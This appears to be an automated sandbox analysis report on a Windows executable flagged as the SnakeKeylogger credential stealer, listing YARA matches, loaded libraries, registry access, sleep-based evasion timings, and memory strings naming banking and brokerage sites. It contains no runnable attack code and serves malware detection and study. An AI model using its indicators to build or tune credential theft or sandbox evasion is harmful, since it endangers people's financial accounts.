Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582E6D3
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582E6E0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582DE24
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582DE30
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05821E72
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D9CB
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D9D8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D119
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D128
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_058210AD
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_058210B8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582F835
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582003F
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05820040
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582F840
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582C878
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582F3D9
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_058293E3
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582F3E8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05828320
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582EB29
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582EB38
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582E288
Source: Lpjrd6Wxad.exe, 00000000.00000002.4034472681.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Lpjrd6Wxad.exe
Source: Lpjrd6Wxad.exe, 00000000.00000002.4034420315.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Lpjrd6Wxad.exe
Source: Lpjrd6Wxad.exe, 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Lpjrd6Wxad.exe
Source: Lpjrd6Wxad.exe | Binary or memory string: OriginalFilenameRemington.exe4 vs Lpjrd6Wxad.exe
Source: Lpjrd6Wxad.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Lpjrd6Wxad.exe, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Lpjrd6Wxad.exe, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Lpjrd6Wxad.exe, JA-.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.winEXE@1/0@4/4
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Mutant created: NULL
Source: Lpjrd6Wxad.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Lpjrd6Wxad.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Lpjrd6Wxad.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Lpjrd6Wxad.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Lpjrd6Wxad.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01029C30 push esp; retf 02C2h | 0_2_01029D55
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01026FC8 push 5502C29Fh; retn 5502h | 0_2_01027536
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01025D08 push dword ptr [ecx-75h]; iretd | 0_2_01025D12
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01022D49 push 8BFFFFFFh; retf | 0_2_01022D4F
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Memory allocated: 1020000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Memory allocated: 2AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598969
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598734
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598499
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598340
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598191
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598071
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597969
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596985
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596860
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596735
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596610
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596485
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596360
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596235
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 596110
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595985
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595813
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595610
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595395
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595278
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595168
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 595063
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594938
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594813
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594688
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594578
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594469
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594344
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 594110
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 593985
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 593860
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 593735
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 593610Jump to behavior
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Window / User API: threadDelayed 3035
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Window / User API: threadDelayed 6785
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4708 | Thread sleep count: 3035 > 30
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4708 | Thread sleep count: 6785 > 30
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598499s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598340s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598191s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -598071s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595813s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595395s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595278s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595168s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594938s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594813s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594688s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594578s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594469s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594344s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -594110s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -593985s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -593860s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -593735s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe TID: 4916 | Thread sleep time: -593610s >= -30000s
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598969
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598734
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598499
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598340
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598191
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Thread delayed: delay time: 598071
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000004082000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003D63000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
